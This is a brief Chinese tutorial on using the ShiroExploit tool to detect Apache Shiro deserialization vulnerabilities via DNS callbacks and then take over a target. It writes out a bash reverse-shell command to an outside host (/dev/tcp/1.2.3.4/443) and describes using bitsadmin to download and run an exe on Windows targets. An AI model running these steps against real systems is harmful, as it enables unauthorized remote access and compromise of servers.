文章目录
01 下载ShiroExploit.V2.3,并运行.jar
- 01 下载ShiroExploit.V2.3,并运行.jar
- 02 运行后的界面
- 03输入测试的url
- 04 选择检测方式
- 05 判断是否存在漏洞的依据
- 06 反弹shell
- 在github上直接搜索下载
- 有源码,可以自己编译成.jar
Shiro550
无需选择操作系统类型,Shiro721
需要选择操作系统类型- 复杂Http请求支持直接粘贴数据包
- 可以自己直接输入被检测是否存在shire反序列漏洞的地址
- CEYE.IO
可以不进行任何配置,配置文件中已经预置了 CEYE 域名和对应的 Token,当然也可以对其进行修改。
程序会首先使用 URLDNS 筛选出唯一 Key,然后依次调用各个 Gadget 生成 Payload
- dnslog.cn
可以不进行任何配置,每次启动时程序会自动从 dnslog.cn 申请一个 DNS Record。
程序会首先使用 URLDNS 筛选出唯一 Key,然后依次调用各个 Gadget 生成 Payload
缺点:少数时候 dnslog.cn 会间隔较久才显示 DNS 解析结果导致程序无法找到 Key 或者有效的 Gadget,且 dnslog.cn 只会记录最近的10条 DNS 解析记录
- 程序在判断目标应用是否存在漏洞时,窗口上部的输入框无法进行输入。
- 当程序检测出目标应用存在漏洞时,输入框可以进行输入并执行命令。
反弹shell(linux)
采用bash -i >& /dev/tcp/1.2.3.4/443 0>&1
的方式反弹 shell反弹shell(Windows)
采用bitsadmin
下载指定 URL 的 exe 文件并执行的方式获取 shell- 如果反弹shell无法成功,可能自己的阿里云主机的端口未开放
参考链接:https://github.com/feihong-cs/ShiroExploit